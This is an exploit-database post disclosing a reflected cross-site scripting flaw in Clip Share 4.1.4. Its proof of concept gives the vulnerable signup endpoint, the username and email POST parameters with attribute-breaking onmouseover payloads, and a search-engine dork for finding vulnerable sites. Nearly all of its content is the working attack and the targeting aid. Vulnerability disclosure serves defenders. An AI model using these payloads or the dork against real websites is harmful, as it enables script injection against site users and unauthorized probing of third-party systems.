Share
## https://sploitus.com/exploit?id=PACKETSTORM:173587
====================================================================================================================================  
| # Title : Clip Share 4.1.4 XSS Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |  
| # Vendor : http://www.clip-share.com/ |  
| # Dork : Powered By ClipShare |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine .  
  
[+] Xss :  
  
This vulnerability affects /ClipShare/signup.   
URL encoded POST input username was set to xtqewoxj" onmouseover=prompt(993897) bad="  
The input is reflected inside a tag parameter between double quotes.  
URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(901680) bad="  
The input is reflected inside a tag parameter between double quotes.  
  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================